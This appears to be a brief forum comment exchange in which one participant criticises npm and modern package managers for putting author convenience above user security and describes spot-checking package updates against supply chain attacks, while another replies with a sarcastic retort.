There are ways, but at a high level, I don't care. I hate how modern package managers have come to value author convenience over downstream user security.
In the meantime, I'm trying to do my part through occasional random spot inspections when there's an update to a package, and encourage others to do the same for swarm coverage.
We wait and see whether the supply chain attacks crescendo to a crisis and force NPM's hand. In the meantime I'm doing everything I can to avoid NPM and to uphold "just don't use the software if you don't like it"... but people like myself don't always have a choice.
There are ways, but at a high level, I don't care. I hate how modern package managers have come to value author convenience over downstream user security.
Fair enough.
In the meantime, I'm trying to do my part through occasional random spot inspections when there's an update to a package, and encourage others to do the same for swarm coverage.
Ahh, the classic I don't care. What if other people don't care about your problems? What if both sides don't care about each other? What then?
We wait and see whether the supply chain attacks crescendo to a crisis and force NPM's hand. In the meantime I'm doing everything I can to avoid NPM and to uphold "just don't use the software if you don't like it"... but people like myself don't always have a choice.